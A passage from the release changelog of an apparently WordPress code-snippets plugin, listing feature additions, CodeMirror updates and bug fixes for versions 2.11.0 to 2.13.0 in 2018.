*   Updated CodeMirror to version 5.43.0

**2.13.0 (17 Dec 2018)**

*   Added: Search/replace functionality to the snippet editor. See here for a list of keyboard shortcuts. \[#\]
*   Updated CodeMirror to version 5.42.0
*   Added: Option to make admin menu more compact
*   Fixed: Problem clearing recently active snippet list
*   Improved: Integration between plugin and the CodeMirror library, to prevent collisions
*   Improved: Added additional styles to editor settings preview
*   Added: PHP linter to code editor
*   Improved: Use external scripts instead of inline scripts
*   Fixed: Missing functionality for ‘Auto Close Brackets’ and ‘Highlight Selection Matches’ settings

**2.12.1 (15 Nov 2018)**

*   Improved: CodeMirror updated to version 5.41.0
*   Improved: Attempt to create database columns that might be missing after a table upgrade
*   Improved: Streamlined upgrade process
*   Fixed: Interface layout on sites using right-to-left languages
*   Improved: Made search box appear at top of page on mobile \[#\]
*   Updated screenshots

**2.12.0 (23 Sep 2018)**

*   Fixed: Prevented hidden columns setting from reverting to default
*   Improved: Updated import page to improve usability
*   Improved: Added Import button next to page title on manage page
*   Improved: Added coloured banner indicating whether a snippet is active when editing
*   Update CodeMirror to 5.40.0

**2.11.0 (24 Jul 2018)**

*   Added: Ability to assign a priority to snippets, to determine the order in which they are executed
*   Improvement: The editor cursor position will be preserved when saving a snippet
*   Added: Pressing Ctrl/Cmd + S while writing a snippet will save it
*   Added: Shadow opening PHP tag above the code editor
*   Improved: Updated the message shown when there are no snippets
*   Added: Install sample snippets when the plugin is installed
*   Improved: Show all available tags when selecting the tag field
*   Added: Filter hook for controlling the default list table view
*   Added: Action for cloning snippets

**The full changelog is available on GitHub**

Tag

#php